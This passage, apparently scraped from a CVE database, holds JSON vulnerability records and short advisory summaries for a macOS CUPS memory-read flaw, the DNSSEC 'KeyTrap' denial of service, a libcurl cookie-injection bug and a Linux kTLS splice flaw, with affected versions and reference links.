malicious application may be able to read restricted memory", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-10-30T02:06:10", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/en-us/HT212011" }, { "name": "[debian-lts-announce] 20211030 [SECURITY] [DLA 2800-1] cups security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00027.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2020-10001", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "11.1" } ] } } ] }, "vendor_name": "Apple" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An input validation issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave. A malicious application may be able to read restricted memory." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "A malicious application may be able to read restricted memory" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/en-us/HT212011", "refsource": "MISC", "url": "https://support.apple.com/en-us/HT212011" }, { "name": "[debian-lts-announce] 20211030 [SECURITY] [DLA 2800-1] cups security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00027.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2020-10001", "datePublished": "2021-04-02T17:24:50", "dateReserved": "2020-03-02T00:00:00", "dateUpdated": "2024-08-04T10:50:57.819Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-50387
Vulnerability from cvelistv5
Published
2024-02-14 00:00
Modified
2024-08-02 22:16
Severity ?
EPSS score ?
Summary
Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:16:46.692Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.athene-center.de/aktuelles/key-trap" }, { "tags": [ "x_transferred" ], "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "tags": [ "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2023-50387" }, { "tags": [ "x_transferred" ], "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "tags": [ "x_transferred" ], "url": "https://www.theregister.com/2024/02/13/dnssec_vulnerability_internet/" }, { "tags": [ "x_transferred" ], "url": "https://news.ycombinator.com/item?id=39367411" }, { "tags": [ "x_transferred" ], "url": "https://www.securityweek.com/keytrap-dns-attack-could-disable-large-parts-of-internet-researchers/" }, { "tags": [ "x_transferred" ], "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "tags": [ "x_transferred" ], "url": "https://news.ycombinator.com/item?id=39372384" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "tags": [ "x_transferred" ], "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "tags": [ "x_transferred" ], "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-50387" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-50387" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219823" }, { "tags": [ "x_transferred" ], "url": "https://www.athene-center.de/fileadmin/content/PDF/Technical_Report_KeyTrap.pdf" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240307-0007/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the \"KeyTrap\" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T16:14:16.780094", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.athene-center.de/aktuelles/key-trap" }, { "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "url": "https://kb.isc.org/docs/cve-2023-50387" }, { "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "url": "https://www.theregister.com/2024/02/13/dnssec_vulnerability_internet/" }, { "url": "https://news.ycombinator.com/item?id=39367411" }, { "url": "https://www.securityweek.com/keytrap-dns-attack-could-disable-large-parts-of-internet-researchers/" }, { "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "url": "https://news.ycombinator.com/item?id=39372384" }, { "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-50387" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-50387" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219823" }, { "url": "https://www.athene-center.de/fileadmin/content/PDF/Technical_Report_KeyTrap.pdf" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "url": "https://security.netapp.com/advisory/ntap-20240307-0007/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-50387", "datePublished": "2024-02-14T00:00:00", "dateReserved": "2023-12-07T00:00:00", "dateUpdated": "2024-08-02T22:16:46.692Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38546
Vulnerability from cvelistv5
Published
2023-10-18 03:51
Modified
2024-09-13 15:02
Severity ?
EPSS score ?
Summary
This flaw allows an attacker to insert cookies at will into a running program
using libcurl, if the specific series of conditions are met.
libcurl performs transfers. In its API, an application creates "easy handles"
that are the individual handles for single transfers.
libcurl provides a function call that duplicates en easy handle called
[curl_easy_duphandle](https://curl.se/libcurl/c/curl_easy_duphandle.html).
If a transfer has cookies enabled when the handle is duplicated, the
cookie-enable state is also cloned - but without cloning the actual
cookies. If the source handle did not read any cookies from a specific file on
disk, the cloned version of the handle would instead store the file name as
`none` (using the four ASCII letters, no quotes).
Subsequent use of the cloned handle that does not explicitly set a source to
load cookies from would then inadvertently load cookies from a file named
`none` - if such a file exists and is readable in the current directory of the
program using libcurl. And if using the correct file format of course.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:46:55.785Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://curl.se/docs/CVE-2023-38546.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGMXNRNSJ4ETDK6FRNU3J7SABXPWCHSQ/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214036" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214063" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214057" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214058" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jan/34" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jan/37" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jan/38" }, { "tags": [ "x_transferred" ], "url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=8868" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38546", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-13T15:01:53.358515Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-13T15:02:37.137Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "curl", "vendor": "curl", "versions": [ { "lessThan": "8.4.0", "status": "affected", "version": "8.4.0", "versionType": "semver" }, { "lessThan": "7.9.1", "status": "unaffected", "version": "7.9.1", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "value": "This flaw allows an attacker to insert cookies at will into a running program\nusing libcurl, if the specific series of conditions are met.\n\nlibcurl performs transfers. In its API, an application creates \"easy handles\"\nthat are the individual handles for single transfers.\n\nlibcurl provides a function call that duplicates en easy handle called\n[curl_easy_duphandle](https://curl.se/libcurl/c/curl_easy_duphandle.html).\n\nIf a transfer has cookies enabled when the handle is duplicated, the\ncookie-enable state is also cloned - but without cloning the actual\ncookies. If the source handle did not read any cookies from a specific file on\ndisk, the cloned version of the handle would instead store the file name as\n`none` (using the four ASCII letters, no quotes).\n\nSubsequent use of the cloned handle that does not explicitly set a source to\nload cookies from would then inadvertently load cookies from a file named\n`none` - if such a file exists and is readable in the current directory of the\nprogram using libcurl. And if using the correct file format of course.\n" } ], "providerMetadata": { "dateUpdated": "2023-10-18T03:51:31.276Z", "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "shortName": "hackerone" }, "references": [ { "url": "https://curl.se/docs/CVE-2023-38546.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGMXNRNSJ4ETDK6FRNU3J7SABXPWCHSQ/" }, { "url": "https://support.apple.com/kb/HT214036" }, { "url": "https://support.apple.com/kb/HT214063" }, { "url": "https://support.apple.com/kb/HT214057" }, { "url": "https://support.apple.com/kb/HT214058" }, { "url": "http://seclists.org/fulldisclosure/2024/Jan/34" }, { "url": "http://seclists.org/fulldisclosure/2024/Jan/37" }, { "url": "http://seclists.org/fulldisclosure/2024/Jan/38" }, { "url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=8868" } ] } }, "cveMetadata": { "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "assignerShortName": "hackerone", "cveId": "CVE-2023-38546", "datePublished": "2023-10-18T03:51:31.276Z", "dateReserved": "2023-07-20T01:00:12.444Z", "dateUpdated": "2024-09-13T15:02:37.137Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-0646
Vulnerability from cvelistv5
Published
2024-01-17 15:16
Modified
2024-10-16 14:59
Severity ?
EPSS score ?
Summary
Kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T18:11:35.718Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0850", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0850" }, { "name": "RHSA-2024:0851", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0851" }, { "name": "RHSA-2024:0876", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0876" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1251", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1251" }, { "name": "RHSA-2024:1253", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1253" }, { "name": "RHSA-2024:1268", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1268" }, { "name": "RHSA-2024:1269", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1269" }, { "name": "RHSA-2024:1278", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1278" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1367", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1367" }, { "name": "RHSA-2024:1368", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1368" }, { "name": "RHSA-2024:1377", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1377" }, { "name": "RHSA-2024:1382", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1382" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0646" }, { "name": "RHBZ#2253908", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://git.kernel.org/pub/scm/linux/kernel", "defaultStatus": "unaffected", "packageName": "kernel", "versions": [ { "lessThan": "6.7-rc5", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.rt7.320.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::nfv", "cpe:/a:redhat:rhel_tus:8.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.rt13.179.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::realtime", "cpe:/a:redhat:rhel_tus:8.4::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.rt7.201.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.8::crb", "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", 